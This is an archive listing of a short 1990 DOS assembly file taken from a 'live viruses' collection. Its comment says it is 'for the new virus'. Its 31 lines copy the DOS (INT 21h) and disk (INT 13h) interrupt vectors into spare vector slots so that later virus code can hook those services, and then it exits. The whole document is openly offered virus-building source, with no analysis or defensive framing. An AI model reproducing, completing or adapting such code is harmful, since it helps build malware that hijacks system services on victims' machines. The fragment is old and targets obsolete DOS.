home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / live_viruses / virus_collections / int64.asm < prev    next >
Assembly Source File  |  1990-02-26  |  501b  |  31 lines

  1.  
  2. ;--------------------------------------------------------------------------
  3. ;        PUT INT 21H VECT. TO INT 64H (for the new virus)
  4. ;--------------------------------------------------------------------------
  5. mov    ax,0
  6. mov    ds,ax
  7. push     [84h]
  8. pop     [190h]
  9.  
  10. push    [85h]
  11. pop    [191h]
  12.  
  13. push    [86h]
  14. pop    [192h]
  15.  
  16. push    [87h]
  17. pop    [193h]
  18.  
  19. ; put int 13 vector to int 65
  20.  
  21. push word ptr [004ch]
  22. pop word ptr [0194h]
  23. push word ptr [004eh]
  24. pop word ptr [0196h]
  25.  
  26. ;
  27.  
  28. mov    ah,4ch
  29. mov    al,1
  30. int    21h
  31.